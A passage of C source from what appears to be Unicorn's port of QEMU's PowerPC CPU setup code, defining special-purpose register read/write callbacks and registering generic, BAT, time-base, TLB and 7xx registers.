    gen_helper_store_dpdes(tcg_ctx, tcg_ctx->cpu_env, cpu_gpr[gprn]);
}
#endif

/* PowerPC 601 specific registers */
/* RTC */
static void spr_read_601_rtcl(DisasContext *ctx, int gprn, int sprn)
{
    TCGContext *tcg_ctx = ctx->uc->tcg_ctx;
    gen_helper_load_601_rtcl(tcg_ctx, cpu_gpr[gprn], tcg_ctx->cpu_env);
}

static void spr_read_601_rtcu(DisasContext *ctx, int gprn, int sprn)
{
    TCGContext *tcg_ctx = ctx->uc->tcg_ctx;
    gen_helper_load_601_rtcu(tcg_ctx, cpu_gpr[gprn], tcg_ctx->cpu_env);
}

static void spr_write_601_rtcu(DisasContext *ctx, int sprn, int gprn)
{
    TCGContext *tcg_ctx =
ctx->uc->tcg_ctx; gen_helper_store_601_rtcu(tcg_ctx, tcg_ctx->cpu_env, cpu_gpr[gprn]); } static void spr_write_601_rtcl(DisasContext *ctx, int sprn, int gprn) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; gen_helper_store_601_rtcl(tcg_ctx, tcg_ctx->cpu_env, cpu_gpr[gprn]); } static void spr_write_hid0_601(DisasContext *ctx, int sprn, int gprn) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; gen_helper_store_hid0_601(tcg_ctx, tcg_ctx->cpu_env, cpu_gpr[gprn]); /* Must stop the translation as endianness may have changed */ gen_stop_exception(ctx); } /* Unified bats */ static void spr_read_601_ubat(DisasContext *ctx, int gprn, int sprn) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; tcg_gen_ld_tl(tcg_ctx, cpu_gpr[gprn], tcg_ctx->cpu_env, offsetof(CPUPPCState, IBAT[sprn & 1][(sprn - SPR_IBAT0U) / 2])); } static void spr_write_601_ubatu(DisasContext *ctx, int sprn, int gprn) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv_i32 t0 = tcg_const_i32(tcg_ctx, (sprn - SPR_IBAT0U) / 2); gen_helper_store_601_batl(tcg_ctx, tcg_ctx->cpu_env, t0, cpu_gpr[gprn]); tcg_temp_free_i32(tcg_ctx, t0); } static void spr_write_601_ubatl(DisasContext *ctx, int sprn, int gprn) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv_i32 t0 = tcg_const_i32(tcg_ctx, (sprn - SPR_IBAT0U) / 2); gen_helper_store_601_batu(tcg_ctx, tcg_ctx->cpu_env, t0, cpu_gpr[gprn]); tcg_temp_free_i32(tcg_ctx, t0); } /* PowerPC 40x specific registers */ static void spr_read_40x_pit(DisasContext *ctx, int gprn, int sprn) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; #ifdef UNICORN_ARCH_POSTFIX glue(gen_helper_load_40x_pit, UNICORN_ARCH_POSTFIX)(tcg_ctx, cpu_gpr[gprn], tcg_ctx->cpu_env); #else gen_helper_load_40x_pit(tcg_ctx, cpu_gpr[gprn], tcg_ctx->cpu_env); #endif } static void spr_write_40x_pit(DisasContext *ctx, int sprn, int gprn) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; #ifdef UNICORN_ARCH_POSTFIX glue(gen_helper_store_40x_pit, UNICORN_ARCH_POSTFIX)(tcg_ctx, tcg_ctx->cpu_env, cpu_gpr[gprn]); #else gen_helper_store_40x_pit(tcg_ctx, tcg_ctx->cpu_env, cpu_gpr[gprn]); #endif } static void spr_write_40x_dbcr0(DisasContext *ctx, int sprn, int gprn) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; gen_store_spr(tcg_ctx, sprn, cpu_gpr[gprn]); #ifdef UNICORN_ARCH_POSTFIX glue(gen_helper_store_40x_dbcr0, UNICORN_ARCH_POSTFIX)(tcg_ctx, tcg_ctx->cpu_env, cpu_gpr[gprn]); #else gen_helper_store_40x_dbcr0(tcg_ctx, tcg_ctx->cpu_env, cpu_gpr[gprn]); #endif /* We must stop translation as we may have rebooted */ gen_stop_exception(ctx); } static void spr_write_40x_sler(DisasContext *ctx, int sprn, int gprn) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; #ifdef UNICORN_ARCH_POSTFIX glue(gen_helper_store_40x_sler, UNICORN_ARCH_POSTFIX)(tcg_ctx, tcg_ctx->cpu_env, cpu_gpr[gprn]); #else gen_helper_store_40x_sler(tcg_ctx, tcg_ctx->cpu_env, cpu_gpr[gprn]); #endif } static void spr_write_booke_tcr(DisasContext *ctx, int sprn, int gprn) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; gen_helper_store_booke_tcr(tcg_ctx, tcg_ctx->cpu_env, cpu_gpr[gprn]); } static void spr_write_booke_tsr(DisasContext *ctx, int sprn, int gprn) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; gen_helper_store_booke_tsr(tcg_ctx, tcg_ctx->cpu_env, cpu_gpr[gprn]); } /* PowerPC 403 specific registers */ /* PBL1 / PBU1 / PBL2 / PBU2 */ static void spr_read_403_pbr(DisasContext *ctx, int gprn, int sprn) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; tcg_gen_ld_tl(tcg_ctx, cpu_gpr[gprn], tcg_ctx->cpu_env, offsetof(CPUPPCState, pb[sprn - SPR_403_PBL1])); } static void spr_write_403_pbr(DisasContext *ctx, int sprn, int gprn) { TCGContext *tcg_ctx = 
ctx->uc->tcg_ctx; TCGv_i32 t0 = tcg_const_i32(tcg_ctx, sprn - SPR_403_PBL1); gen_helper_store_403_pbr(tcg_ctx, tcg_ctx->cpu_env, t0, cpu_gpr[gprn]); tcg_temp_free_i32(tcg_ctx, t0); } static void spr_write_pir(DisasContext *ctx, int sprn, int gprn) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv t0 = tcg_temp_new(tcg_ctx); tcg_gen_andi_tl(tcg_ctx, t0, cpu_gpr[gprn], 0xF); gen_store_spr(tcg_ctx, SPR_PIR, t0); tcg_temp_free(tcg_ctx, t0); } /* SPE specific registers */ static void spr_read_spefscr(DisasContext *ctx, int gprn, int sprn) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv_i32 t0 = tcg_temp_new_i32(tcg_ctx); tcg_gen_ld_i32(tcg_ctx, t0, tcg_ctx->cpu_env, offsetof(CPUPPCState, spe_fscr)); tcg_gen_extu_i32_tl(tcg_ctx, cpu_gpr[gprn], t0); tcg_temp_free_i32(tcg_ctx, t0); } static void spr_write_spefscr(DisasContext *ctx, int sprn, int gprn) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv_i32 t0 = tcg_temp_new_i32(tcg_ctx); tcg_gen_trunc_tl_i32(tcg_ctx, t0, cpu_gpr[gprn]); tcg_gen_st_i32(tcg_ctx, t0, tcg_ctx->cpu_env, offsetof(CPUPPCState, spe_fscr)); tcg_temp_free_i32(tcg_ctx, t0); } /* Callback used to write the exception vector base */ static void spr_write_excp_prefix(DisasContext *ctx, int sprn, int gprn) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv t0 = tcg_temp_new(tcg_ctx); tcg_gen_ld_tl(tcg_ctx, t0, tcg_ctx->cpu_env, offsetof(CPUPPCState, ivpr_mask)); tcg_gen_and_tl(tcg_ctx, t0, t0, cpu_gpr[gprn]); tcg_gen_st_tl(tcg_ctx, t0, tcg_ctx->cpu_env, offsetof(CPUPPCState, excp_prefix)); gen_store_spr(tcg_ctx, sprn, t0); tcg_temp_free(tcg_ctx, t0); } static void spr_write_excp_vector(DisasContext *ctx, int sprn, int gprn) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; int sprn_offs; if (sprn >= SPR_BOOKE_IVOR0 && sprn <= SPR_BOOKE_IVOR15) { sprn_offs = sprn - SPR_BOOKE_IVOR0; } else if (sprn >= SPR_BOOKE_IVOR32 && sprn <= SPR_BOOKE_IVOR37) { sprn_offs = sprn - SPR_BOOKE_IVOR32 + 32; } else if (sprn >= SPR_BOOKE_IVOR38 && sprn <= SPR_BOOKE_IVOR42) { sprn_offs = sprn - SPR_BOOKE_IVOR38 + 38; } else { printf("Trying to write an unknown exception vector %d %03x\n", sprn, sprn); gen_inval_exception(ctx, POWERPC_EXCP_PRIV_REG); return; } TCGv t0 = tcg_temp_new(tcg_ctx); tcg_gen_ld_tl(tcg_ctx, t0, tcg_ctx->cpu_env, offsetof(CPUPPCState, ivor_mask)); tcg_gen_and_tl(tcg_ctx, t0, t0, cpu_gpr[gprn]); tcg_gen_st_tl(tcg_ctx, t0, tcg_ctx->cpu_env, offsetof(CPUPPCState, excp_vectors[sprn_offs])); gen_store_spr(tcg_ctx, sprn, t0); tcg_temp_free(tcg_ctx, t0); } static inline void vscr_init(CPUPPCState *env, uint32_t val) { /* Altivec always uses round-to-nearest */ set_float_rounding_mode(float_round_nearest_even, &env->vec_status); helper_mtvscr(env, val); } #define spr_register_kvm(env, num, name, uea_read, uea_write, \ oea_read, oea_write, one_reg_id, initial_value) \ _spr_register(env, num, name, uea_read, uea_write, \ oea_read, oea_write, oea_read, oea_write, initial_value) #define spr_register_kvm_hv(env, num, name, uea_read, uea_write, \ oea_read, oea_write, hea_read, hea_write, \ one_reg_id, initial_value) \ _spr_register(env, num, name, uea_read, uea_write, \ oea_read, oea_write, hea_read, hea_write, initial_value) #define spr_register(env, num, name, uea_read, uea_write, \ oea_read, oea_write, initial_value) \ spr_register_kvm(env, num, name, uea_read, uea_write, \ oea_read, oea_write, 0, initial_value) #define spr_register_hv(env, num, name, uea_read, uea_write, \ oea_read, oea_write, hea_read, hea_write, \ initial_value) \ spr_register_kvm_hv(env, num, name, uea_read, uea_write, \ oea_read, 
                        oea_write, hea_read, hea_write,                      \
                        0, initial_value)

/*
 * Register an SPR with its full set of access hooks: uea_* for problem
 * state (user) accesses, oea_* for privileged accesses and hea_* for
 * hypervisor accesses.
 */
static inline void _spr_register(CPUPPCState *env, int num, const char *name,
                                 void (*uea_read)(DisasContext *ctx,
                                                  int gprn, int sprn),
                                 void (*uea_write)(DisasContext *ctx,
                                                   int sprn, int gprn),
                                 void (*oea_read)(DisasContext *ctx,
                                                  int gprn, int sprn),
                                 void (*oea_write)(DisasContext *ctx,
                                                   int sprn, int gprn),
                                 void (*hea_read)(DisasContext *opaque,
                                                  int gprn, int sprn),
                                 void (*hea_write)(DisasContext *opaque,
                                                   int sprn, int gprn),
#if defined(CONFIG_KVM)
                                 uint64_t one_reg_id,
#endif
                                 target_ulong initial_value)
{
    ppc_spr_t *spr;

    spr = &env->spr_cb[num];
    if (spr->name != NULL || env->spr[num] != 0x00000000 ||
        spr->oea_read != NULL || spr->oea_write != NULL ||
        spr->uea_read != NULL || spr->uea_write != NULL) {
        printf("Error: Trying to register SPR %d (%03x) twice!\n", num, num);
        exit(1);
    }
#if defined(PPC_DEBUG_SPR)
    printf("*** register spr %d (%03x) %s val " TARGET_FMT_lx "\n", num, num,
           name, initial_value);
#endif
    spr->name = name;
    spr->uea_read = uea_read;
    spr->uea_write = uea_write;
    spr->oea_read = oea_read;
    spr->oea_write = oea_write;
    spr->hea_read = hea_read;
    spr->hea_write = hea_write;
#if defined(CONFIG_KVM)
    spr->one_reg_id = one_reg_id;
#endif
    env->spr[num] = spr->default_value = initial_value;
}

/* Generic PowerPC SPRs */
static void gen_spr_generic(CPUPPCState *env)
{
    /* Integer processing */
    spr_register(env, SPR_XER, "XER",
                 &spr_read_xer, &spr_write_xer,
                 &spr_read_xer, &spr_write_xer,
                 0x00000000);
    /* Branch control */
    spr_register(env, SPR_LR, "LR",
                 &spr_read_lr, &spr_write_lr,
                 &spr_read_lr, &spr_write_lr,
                 0x00000000);
    spr_register(env, SPR_CTR, "CTR",
                 &spr_read_ctr, &spr_write_ctr,
                 &spr_read_ctr, &spr_write_ctr,
                 0x00000000);
    /* Interrupt processing */
    spr_register(env, SPR_SRR0, "SRR0",
                 SPR_NOACCESS, SPR_NOACCESS,
                 &spr_read_generic, &spr_write_generic,
                 0x00000000);
    spr_register(env, SPR_SRR1, "SRR1",
                 SPR_NOACCESS, SPR_NOACCESS,
                 &spr_read_generic, &spr_write_generic,
                 0x00000000);
    /* Processor control */
    spr_register(env, SPR_SPRG0, "SPRG0",
                 SPR_NOACCESS, SPR_NOACCESS,
                 &spr_read_generic, &spr_write_generic,
                 0x00000000);
    spr_register(env, SPR_SPRG1, "SPRG1",
                 SPR_NOACCESS, SPR_NOACCESS,
                 &spr_read_generic, &spr_write_generic,
                 0x00000000);
    spr_register(env, SPR_SPRG2, "SPRG2",
                 SPR_NOACCESS, SPR_NOACCESS,
                 &spr_read_generic, &spr_write_generic,
                 0x00000000);
    spr_register(env, SPR_SPRG3, "SPRG3",
                 SPR_NOACCESS, SPR_NOACCESS,
                 &spr_read_generic, &spr_write_generic,
                 0x00000000);
}

/* SPR common to all non-embedded PowerPC, including 601 */
static void gen_spr_ne_601(CPUPPCState *env)
{
    /* Exception processing */
    spr_register_kvm(env, SPR_DSISR, "DSISR",
                     SPR_NOACCESS, SPR_NOACCESS,
                     &spr_read_generic, &spr_write_generic,
                     KVM_REG_PPC_DSISR, 0x00000000);
    spr_register_kvm(env, SPR_DAR, "DAR",
                     SPR_NOACCESS, SPR_NOACCESS,
                     &spr_read_generic, &spr_write_generic,
                     KVM_REG_PPC_DAR, 0x00000000);
    /* Timer */
    spr_register(env, SPR_DECR, "DECR",
                 SPR_NOACCESS, SPR_NOACCESS,
                 &spr_read_decr, &spr_write_decr,
                 0x00000000);
}

/* Storage Description Register 1 */
static void gen_spr_sdr1(CPUPPCState *env)
{
    if (env->has_hv_mode) {
        /*
         * SDR1 is a hypervisor resource on CPUs which have a
         * hypervisor mode
         */
        spr_register_hv(env, SPR_SDR1, "SDR1",
                        SPR_NOACCESS, SPR_NOACCESS,
                        SPR_NOACCESS, SPR_NOACCESS,
                        &spr_read_generic, &spr_write_sdr1,
                        0x00000000);
    } else {
        spr_register(env, SPR_SDR1, "SDR1",
                     SPR_NOACCESS, SPR_NOACCESS,
                     &spr_read_generic, &spr_write_sdr1,
                     0x00000000);
    }
}

/* BATs 0-3 */
static void gen_low_BATs(CPUPPCState *env)
{
    spr_register(env, SPR_IBAT0U, "IBAT0U",
SPR_NOACCESS, SPR_NOACCESS, &spr_read_ibat, &spr_write_ibatu, 0x00000000); spr_register(env, SPR_IBAT0L, "IBAT0L", SPR_NOACCESS, SPR_NOACCESS, &spr_read_ibat, &spr_write_ibatl, 0x00000000); spr_register(env, SPR_IBAT1U, "IBAT1U", SPR_NOACCESS, SPR_NOACCESS, &spr_read_ibat, &spr_write_ibatu, 0x00000000); spr_register(env, SPR_IBAT1L, "IBAT1L", SPR_NOACCESS, SPR_NOACCESS, &spr_read_ibat, &spr_write_ibatl, 0x00000000); spr_register(env, SPR_IBAT2U, "IBAT2U", SPR_NOACCESS, SPR_NOACCESS, &spr_read_ibat, &spr_write_ibatu, 0x00000000); spr_register(env, SPR_IBAT2L, "IBAT2L", SPR_NOACCESS, SPR_NOACCESS, &spr_read_ibat, &spr_write_ibatl, 0x00000000); spr_register(env, SPR_IBAT3U, "IBAT3U", SPR_NOACCESS, SPR_NOACCESS, &spr_read_ibat, &spr_write_ibatu, 0x00000000); spr_register(env, SPR_IBAT3L, "IBAT3L", SPR_NOACCESS, SPR_NOACCESS, &spr_read_ibat, &spr_write_ibatl, 0x00000000); spr_register(env, SPR_DBAT0U, "DBAT0U", SPR_NOACCESS, SPR_NOACCESS, &spr_read_dbat, &spr_write_dbatu, 0x00000000); spr_register(env, SPR_DBAT0L, "DBAT0L", SPR_NOACCESS, SPR_NOACCESS, &spr_read_dbat, &spr_write_dbatl, 0x00000000); spr_register(env, SPR_DBAT1U, "DBAT1U", SPR_NOACCESS, SPR_NOACCESS, &spr_read_dbat, &spr_write_dbatu, 0x00000000); spr_register(env, SPR_DBAT1L, "DBAT1L", SPR_NOACCESS, SPR_NOACCESS, &spr_read_dbat, &spr_write_dbatl, 0x00000000); spr_register(env, SPR_DBAT2U, "DBAT2U", SPR_NOACCESS, SPR_NOACCESS, &spr_read_dbat, &spr_write_dbatu, 0x00000000); spr_register(env, SPR_DBAT2L, "DBAT2L", SPR_NOACCESS, SPR_NOACCESS, &spr_read_dbat, &spr_write_dbatl, 0x00000000); spr_register(env, SPR_DBAT3U, "DBAT3U", SPR_NOACCESS, SPR_NOACCESS, &spr_read_dbat, &spr_write_dbatu, 0x00000000); spr_register(env, SPR_DBAT3L, "DBAT3L", SPR_NOACCESS, SPR_NOACCESS, &spr_read_dbat, &spr_write_dbatl, 0x00000000); env->nb_BATs += 4; } /* BATs 4-7 */ static void gen_high_BATs(CPUPPCState *env) { spr_register(env, SPR_IBAT4U, "IBAT4U", SPR_NOACCESS, SPR_NOACCESS, &spr_read_ibat_h, &spr_write_ibatu_h, 0x00000000); spr_register(env, SPR_IBAT4L, "IBAT4L", SPR_NOACCESS, SPR_NOACCESS, &spr_read_ibat_h, &spr_write_ibatl_h, 0x00000000); spr_register(env, SPR_IBAT5U, "IBAT5U", SPR_NOACCESS, SPR_NOACCESS, &spr_read_ibat_h, &spr_write_ibatu_h, 0x00000000); spr_register(env, SPR_IBAT5L, "IBAT5L", SPR_NOACCESS, SPR_NOACCESS, &spr_read_ibat_h, &spr_write_ibatl_h, 0x00000000); spr_register(env, SPR_IBAT6U, "IBAT6U", SPR_NOACCESS, SPR_NOACCESS, &spr_read_ibat_h, &spr_write_ibatu_h, 0x00000000); spr_register(env, SPR_IBAT6L, "IBAT6L", SPR_NOACCESS, SPR_NOACCESS, &spr_read_ibat_h, &spr_write_ibatl_h, 0x00000000); spr_register(env, SPR_IBAT7U, "IBAT7U", SPR_NOACCESS, SPR_NOACCESS, &spr_read_ibat_h, &spr_write_ibatu_h, 0x00000000); spr_register(env, SPR_IBAT7L, "IBAT7L", SPR_NOACCESS, SPR_NOACCESS, &spr_read_ibat_h, &spr_write_ibatl_h, 0x00000000); spr_register(env, SPR_DBAT4U, "DBAT4U", SPR_NOACCESS, SPR_NOACCESS, &spr_read_dbat_h, &spr_write_dbatu_h, 0x00000000); spr_register(env, SPR_DBAT4L, "DBAT4L", SPR_NOACCESS, SPR_NOACCESS, &spr_read_dbat_h, &spr_write_dbatl_h, 0x00000000); spr_register(env, SPR_DBAT5U, "DBAT5U", SPR_NOACCESS, SPR_NOACCESS, &spr_read_dbat_h, &spr_write_dbatu_h, 0x00000000); spr_register(env, SPR_DBAT5L, "DBAT5L", SPR_NOACCESS, SPR_NOACCESS, &spr_read_dbat_h, &spr_write_dbatl_h, 0x00000000); spr_register(env, SPR_DBAT6U, "DBAT6U", SPR_NOACCESS, SPR_NOACCESS, &spr_read_dbat_h, &spr_write_dbatu_h, 0x00000000); spr_register(env, SPR_DBAT6L, "DBAT6L", SPR_NOACCESS, SPR_NOACCESS, &spr_read_dbat_h, &spr_write_dbatl_h, 0x00000000); 
    spr_register(env, SPR_DBAT7U, "DBAT7U",
                 SPR_NOACCESS, SPR_NOACCESS,
                 &spr_read_dbat_h, &spr_write_dbatu_h,
                 0x00000000);
    spr_register(env, SPR_DBAT7L, "DBAT7L",
                 SPR_NOACCESS, SPR_NOACCESS,
                 &spr_read_dbat_h, &spr_write_dbatl_h,
                 0x00000000);
    env->nb_BATs += 4;
}

/* Generic PowerPC time base */
static void gen_tbl(CPUPPCState *env)
{
    spr_register(env, SPR_VTBL, "TBL",
                 &spr_read_tbl, SPR_NOACCESS,
                 &spr_read_tbl, SPR_NOACCESS,
                 0x00000000);
    spr_register(env, SPR_TBL, "TBL",
                 &spr_read_tbl, SPR_NOACCESS,
                 &spr_read_tbl, &spr_write_tbl,
                 0x00000000);
    spr_register(env, SPR_VTBU, "TBU",
                 &spr_read_tbu, SPR_NOACCESS,
                 &spr_read_tbu, SPR_NOACCESS,
                 0x00000000);
    spr_register(env, SPR_TBU, "TBU",
                 &spr_read_tbu, SPR_NOACCESS,
                 &spr_read_tbu, &spr_write_tbu,
                 0x00000000);
}

/* Software table search registers */
static void gen_6xx_7xx_soft_tlb(CPUPPCState *env, int nb_tlbs, int nb_ways)
{
    env->nb_tlb = nb_tlbs;
    env->nb_ways = nb_ways;
    env->id_tlbs = 1;
    env->tlb_type = TLB_6XX;
    spr_register(env, SPR_DMISS, "DMISS",
                 SPR_NOACCESS, SPR_NOACCESS,
                 &spr_read_generic, SPR_NOACCESS,
                 0x00000000);
    spr_register(env, SPR_DCMP, "DCMP",
                 SPR_NOACCESS, SPR_NOACCESS,
                 &spr_read_generic, SPR_NOACCESS,
                 0x00000000);
    spr_register(env, SPR_HASH1, "HASH1",
                 SPR_NOACCESS, SPR_NOACCESS,
                 &spr_read_generic, SPR_NOACCESS,
                 0x00000000);
    spr_register(env, SPR_HASH2, "HASH2",
                 SPR_NOACCESS, SPR_NOACCESS,
                 &spr_read_generic, SPR_NOACCESS,
                 0x00000000);
    spr_register(env, SPR_IMISS, "IMISS",
                 SPR_NOACCESS, SPR_NOACCESS,
                 &spr_read_generic, SPR_NOACCESS,
                 0x00000000);
    spr_register(env, SPR_ICMP, "ICMP",
                 SPR_NOACCESS, SPR_NOACCESS,
                 &spr_read_generic, SPR_NOACCESS,
                 0x00000000);
    spr_register(env, SPR_RPA, "RPA",
                 SPR_NOACCESS, SPR_NOACCESS,
                 &spr_read_generic, &spr_write_generic,
                 0x00000000);
}

/* SPR common to MPC755 and G2 */
static void gen_spr_G2_755(CPUPPCState *env)
{
    /* SPRGs */
    spr_register(env, SPR_SPRG4, "SPRG4",
                 SPR_NOACCESS, SPR_NOACCESS,
                 &spr_read_generic, &spr_write_generic,
                 0x00000000);
    spr_register(env, SPR_SPRG5, "SPRG5",
                 SPR_NOACCESS, SPR_NOACCESS,
                 &spr_read_generic, &spr_write_generic,
                 0x00000000);
    spr_register(env, SPR_SPRG6, "SPRG6",
                 SPR_NOACCESS, SPR_NOACCESS,
                 &spr_read_generic, &spr_write_generic,
                 0x00000000);
    spr_register(env, SPR_SPRG7, "SPRG7",
                 SPR_NOACCESS, SPR_NOACCESS,
                 &spr_read_generic, &spr_write_generic,
                 0x00000000);
}

/* SPR common to all 7xx PowerPC implementations */
static void gen_spr_7xx(CPUPPCState *env)
{
    /* Breakpoints */
    /* XXX : not implemented */
    spr_register_kvm(env, SPR_DABR, "DABR",
                     SPR_NOACCESS, SPR_NOACCESS,
                     &spr_read_generic, &spr_write_generic,
                     KVM_REG_PPC_DABR, 0x00000000);
    /* XXX : not implemented */
    spr_register(env, SPR_IABR, "IABR",
                 SPR_NOACCESS, SPR_NOACCESS,
                 &spr_read_generic, &spr_write_generic,
                 0x00000000);
    /* Cache management */
    /* XXX : not implemented */
    spr_register(env, SPR_ICTC, "ICTC",
                 SPR_NOACCESS, SPR_NOACCESS,
                 &spr_read_generic, &spr_write_generic,
                 0x00000000);
    /* Performance monitors */
    /* XXX : not implemented */
    spr_register(env, SPR_7XX_MMCR0, "MMCR0",
                 SPR_NOACCESS, SPR_NOACCESS,
                 &spr_read_generic, &spr_write_generic,
                 0x00000000);
    /* XXX : not implemented */
    spr_register(env, SPR_7XX_MMCR1, "MMCR1",
                 SPR_NOACCESS, SPR_NOACCESS,
                 &spr_read_generic, &spr_write_generic,
                 0x00000000);
    /* XXX : not implemented */
    spr_register(env, SPR_7XX_PMC1, "PMC1",
                 SPR_NOACCESS, SPR_NOACCESS,
                 &spr_read_generic, &spr_write_generic,
                 0x00000000);
    /* XXX : not implemented */
    spr_register(env, SPR_7XX_PMC2, "PMC2",
                 SPR_NOACCESS, SPR_NOACCESS,
                 &spr_read_generic, &spr_write_generic,
                 0x00000000);
    /* XXX : not implemented */
    spr_register(env, SPR_7XX_PMC3, "PMC3",
                 SPR_NOACCESS, SPR_NOACCESS,
                 &spr_read_generic, &spr_write_generic,
                 0x00000000);
    /* XXX : not implemented */
    spr_register(env, SPR_7XX_PMC4, "PMC4",
                 SPR_NOACCESS, SPR_NOACCESS,
                 &spr_read_generic, &spr_write_generic,
                 0x00000000);
    /* XXX : not implemented */
    spr_register(env, SPR_7XX_SIAR, "SIAR",
                 SPR_NOACCESS, SPR_NOACCESS,
                 &spr_read_generic, SPR_NOACCESS,
                 0x00000000);
    /* XXX : not implemented */
    spr_register(env, SPR_7XX_UMMCR0, "UMMCR0",
                 &spr_read_ureg, SPR_NOACCESS,
                 &spr_read_ureg, SPR_NOACCESS,
                 0x00000000);
    /* XXX : not implemented */
    spr_register(env, SPR_7XX_UMMCR1, "UMMCR1",
                 &spr_read_ureg, SPR_NOACCESS,
                 &spr_read_ureg, SPR_NOACCESS,
                 0x00000000);
    /* XXX : not implemented */
    spr_register(env, SPR_7XX_UPMC1, "UPMC1",
                 &spr_read_ureg, SPR_NOACCESS,
                 &spr_read_ureg, SPR_NOACCESS,
                 0x00000000);
    /* XXX : not implemented */
    spr_register(env, SPR_7XX_UPMC2, "UPMC2",
                 &spr_read_ureg, SPR_NOACCESS,
                 &spr_read_ureg, SPR_NOACCESS,
                 0x00000000);
    /* XXX : not implemented */
    spr_register(env, SPR_7XX_UPMC3, "UPMC3",
                 &spr_read_ureg, SPR_NOACCESS,
                 &spr_read_ureg, SPR_NOACCESS,
                 0x00000000);
    /* XXX : not implemented */
    spr_register(env, SPR_7XX_UPMC4, "UPMC4",
                 &spr_read_ureg, SPR_NOACCESS,
                 &spr_read_ureg, SPR_NOACCESS,
                 0x00000000);
    /* XXX : not implemented */
    spr_register(env, SPR_7XX_USIAR, "USIAR",
                 &spr_read_ureg, SPR_NOACCESS,
                 &spr_read_ureg, SPR_NOACCESS,
                 0x00000000);
    /* External access control */
    /* XXX : not implemented */
    spr_register(env, SPR_EAR, "EAR",
                 SPR_NOACCESS, SPR_NOACCESS,
                 &spr_read_generic, &spr_write_generic,
                 0x00000000);
}

#ifdef TARGET_PPC64
static void spr_write_amr(DisasContext *ctx, int sprn, int gprn)
{
    TCGContext *tcg_ctx = ctx->uc->tcg_ctx;
    TCGv t0 = tcg_temp_new(tcg_ctx);
    TCGv t1 = tcg_temp_new(tcg_ctx);
    TCGv t2 = tcg_temp_new(tcg_ctx);

    /*
     * Note, the HV=1 PR=0 case is handled earlier by simply using
     * spr_write_generic for HV mode in the SPR table
     */

    /* Build insertion mask into t1 based on context */
    if (ctx->pr) {
        gen_load_spr(tcg_ctx, t1, SPR_UAMOR);
    } else {
        gen_load_spr(tcg_ctx, t1, SPR_AMOR);
    }
    /* Mask new bits into t2 */
    tcg_gen_and_tl(tcg_ctx, t2, t1, cpu_gpr[gprn]);
    /* Load AMR and clear new bits in t0 */
    gen_load_spr(tcg_ctx, t0, SPR_AMR);
    tcg_gen_andc_tl(tcg_ctx, t0, t0, t1);
    /* OR in the new bits and write the result back */
    tcg_gen_or_tl(tcg_ctx, t0, t0, t2);
    gen_store_spr(tcg_ctx, SPR_AMR, t0);
    spr_store_dump_spr(tcg_ctx, SPR_AMR);
    tcg_temp_free(tcg_ctx, t0);
    tcg_temp_free(tcg_ctx, t1);
    tcg_temp_free(tcg_ctx, t2);
}

static void spr_write_uamor(DisasContext *ctx, int sprn, int gprn)
{
    TCGContext *tcg_ctx = ctx->uc->tcg_ctx;
    TCGv t0 = tcg_temp_new(tcg_ctx);
    TCGv t1 = tcg_temp_new(tcg_ctx);
    TCGv t2 = tcg_temp_new(tcg_ctx);

    /*
     * Note, the HV=1 case is handled earlier by simply using
     * spr_write_generic for HV mode in the SPR table
     */

    /* Build insertion mask into t1 based on context */
    gen_load_spr(tcg_ctx, t1, SPR_AMOR);
    /* Mask new bits into t2 */
    tcg_gen_and_tl(tcg_ctx, t2, t1, cpu_gpr[gprn]);
    /* Load UAMOR and clear new bits in t0 */
    gen_load_spr(tcg_ctx, t0, SPR_UAMOR);
    tcg_gen_andc_tl(tcg_ctx, t0, t0, t1);
    /* OR in the new bits and write the result back */
    tcg_gen_or_tl(tcg_ctx, t0, t0, t2);
    gen_store_spr(tcg_ctx, SPR_UAMOR, t0);
    spr_store_dump_spr(tcg_ctx, SPR_UAMOR);
    tcg_temp_free(tcg_ctx, t0);
    tcg_temp_free(tcg_ctx, t1);
    tcg_temp_free(tcg_ctx, t2);
}

static void spr_write_iamr(DisasContext *ctx, int sprn, int gprn)
{
    TCGContext *tcg_ctx = ctx->uc->tcg_ctx;
    TCGv t0 = tcg_temp_new(tcg_ctx);
    TCGv t1 = tcg_temp_new(tcg_ctx);
    TCGv t2 = tcg_temp_new(tcg_ctx);

    /*
     * Note, the HV=1 case is handled earlier by simply using
     * spr_write_generic for HV mode in the SPR table
     */
    /* Build insertion mask into t1 based on context */
    gen_load_spr(tcg_ctx, t1, SPR_AMOR);
    /* Mask new bits into t2 */
    tcg_gen_and_tl(tcg_ctx, t2, t1, cpu_gpr[gprn]);
    /* Load IAMR and clear new bits in t0 */
    gen_load_spr(tcg_ctx, t0, SPR_IAMR);
    tcg_gen_andc_tl(tcg_ctx, t0, t0, t1);
    /* OR in the new bits and write the result back */
    tcg_gen_or_tl(tcg_ctx, t0, t0, t2);
    gen_store_spr(tcg_ctx, SPR_IAMR, t0);
    spr_store_dump_spr(tcg_ctx, SPR_IAMR);
    tcg_temp_free(tcg_ctx, t0);
    tcg_temp_free(tcg_ctx, t1);
    tcg_temp_free(tcg_ctx, t2);
}

static void gen_spr_amr(CPUPPCState *env)
{
    /*
     * Virtual Page Class Key protection
     *
     * The AMR is accessible either via SPR 13 or SPR 29. SPR 13 is
     * accessible from userspace, SPR 29 is privileged, so we only need
     * to set the KVM ONE_REG id on one of them; we use 29.
     */
    spr_register(env, SPR_UAMR, "UAMR",
                 &spr_read_generic, &spr_write_amr,
                 &spr_read_generic, &spr_write_amr,
                 0);
    spr_register_kvm_hv(env, SPR_AMR, "AMR",
                        SPR_NOACCESS, SPR_NOACCESS,
                        &spr_read_generic, &spr_write_amr,
                        &spr_read_generic, &spr_write_generic,
                        KVM_REG_PPC_AMR, 0);
